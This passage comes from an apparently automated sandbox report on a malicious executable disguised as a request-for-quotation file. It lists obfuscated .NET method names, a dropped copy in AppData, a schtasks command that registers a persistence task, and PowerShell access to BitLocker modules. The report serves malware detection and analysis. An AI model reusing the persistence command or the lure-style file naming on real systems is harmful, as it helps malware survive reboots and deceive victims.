                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, EaKXsxMMEduJxGG4xjT.csHigh entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, DjPSAiMLZHPXieDTNDF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, GSBw9m4TudYHHyonnQ.csHigh entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, oQwkqegZB7vo9PEDsC.csHigh entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, sKaGDFhd7daKD2HCDM.csHigh entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, pStGwHWAhZDI9vOfIH.csHigh entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, wenPDN0lV2brx5PPTj.csHigh entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, CbSV3bzym8O87TbSJt.csHigh entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.csHigh entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, KG4olSYldb1sA0V8RF.csHigh entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, IXLn1HNCQlONxWmLsv.csHigh entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, d91LhKkasGagSZPIlt.csHigh entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, x3T9Ytw1Zeo1bprUX1.csHigh entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, THX12LMbpUTAhaBFVoE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, WI4re4rlxdWBEC7k2o.csHigh entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, hKbC3fIwQJBD85kemO.csHigh entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, WRp4DPbfMDTyk1O1Po.csHigh entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.csHigh entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, dAK0Jo7pGEwxjjvoZ9.csHigh entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, uHYtq8JGWgdmDkrnFe.csHigh entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, U89jwOmf6bjtiChj87.csHigh entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, JYSCnPRc3nAZm3dfNm.csHigh entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, EaKXsxMMEduJxGG4xjT.csHigh entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, DjPSAiMLZHPXieDTNDF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, GSBw9m4TudYHHyonnQ.csHigh entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, oQwkqegZB7vo9PEDsC.csHigh entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, sKaGDFhd7daKD2HCDM.csHigh entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, pStGwHWAhZDI9vOfIH.csHigh entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, wenPDN0lV2brx5PPTj.csHigh entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, CbSV3bzym8O87TbSJt.csHigh entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.csHigh entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, KG4olSYldb1sA0V8RF.csHigh entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, IXLn1HNCQlONxWmLsv.csHigh entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, d91LhKkasGagSZPIlt.csHigh entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, x3T9Ytw1Zeo1bprUX1.csHigh entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, THX12LMbpUTAhaBFVoE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, WI4re4rlxdWBEC7k2o.csHigh entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, hKbC3fIwQJBD85kemO.csHigh entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, WRp4DPbfMDTyk1O1Po.csHigh entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.csHigh entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, dAK0Jo7pGEwxjjvoZ9.csHigh entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, uHYtq8JGWgdmDkrnFe.csHigh entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, U89jwOmf6bjtiChj87.csHigh entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, JYSCnPRc3nAZm3dfNm.csHigh entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, EaKXsxMMEduJxGG4xjT.csHigh entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, DjPSAiMLZHPXieDTNDF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, GSBw9m4TudYHHyonnQ.csHigh entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, oQwkqegZB7vo9PEDsC.csHigh entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, sKaGDFhd7daKD2HCDM.csHigh entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, pStGwHWAhZDI9vOfIH.csHigh entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, wenPDN0lV2brx5PPTj.csHigh entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, CbSV3bzym8O87TbSJt.csHigh entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.csHigh entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, KG4olSYldb1sA0V8RF.csHigh entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, IXLn1HNCQlONxWmLsv.csHigh entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, d91LhKkasGagSZPIlt.csHigh entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile created: C:\Users\user\AppData\Roaming\nDEusQ.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
